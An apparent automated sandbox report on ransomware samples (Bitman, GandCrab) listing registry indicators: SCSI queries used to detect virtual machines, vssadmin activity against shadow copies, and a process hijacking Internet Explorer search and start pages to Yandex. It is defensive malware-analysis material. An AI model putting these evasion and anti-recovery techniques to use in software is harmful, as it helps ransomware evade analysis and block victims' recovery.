\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.qlg-a47717baafc3aa5eac65be9c1607925bef87397e82e94fb9a2615306acb14b13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 7956 setup.exe -
Checks SCSI registry key(s) 3 TTPs 26 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1660 vssadmin.exe 7020 vssadmin.exe -
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer seederexe.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\DisplayName = "Bing" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconURL = "http://www.bing.com/favicon.ico" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IENTSS" seederexe.exe Key deleted \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04 seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\FaviconURLFallback = "http://www.bing.com/favicon.ico" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "https://yandex.ru/search/?win=671&clid=2278734-666&text={searchTerms}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL seederexe.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsInAddressGlobal = "1" seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png" seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\MINIE seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconURLFallback = "http://www.bing.com/favicon.ico" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\Local\\MICROS~1\\INTERN~1\\Services\\YANDEX~1.ICO" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04 seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png" seederexe.exe Key deleted \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Яндекс" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTURL = "https://yandex.ru/search/?win=671&clid=2278734-666&text={searchTerms}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\FaviconURLFallback = "https://www.ya.ru/favicon.ico" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\YaCreationDate = "2024-02-07" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IENTSS" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "https://www.ya.ru/favicon.ico" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\DisplayName = "Яндекс" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\FaviconPath = "C:\\Users\\Admin\\AppData\\Local\\MICROS~1\\INTERN~1\\Services\\YANDEX~1.ICO" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\FaviconURL = "http://www.bing.com/favicon.ico" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" seederexe.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\LinksBandEnabled = "1" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\DisplayName = "Bing" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTTopResultURL seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\URL = "https://yandex.ru/search/?win=671&clid=2278732-666&text={searchTerms}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "https://yandex.ru/search/?win=671&clid=2278732-666&text={searchTerms}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\YaCreationDate = "2024-02-07" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" seederexe.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\SearchScopes seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\SuggestionsURL seederexe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ae97db2e-9d21-11ef-8125-fa9f886f8d04\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" seederexe.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "https://www.ya.ru/?win=671&clid=2278731-666" seederexe.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU FB_8EBE.tmp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} FB_8EBE.tmp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell FB_8EBE.tmp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg FB_8EBE.tmp.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (data) 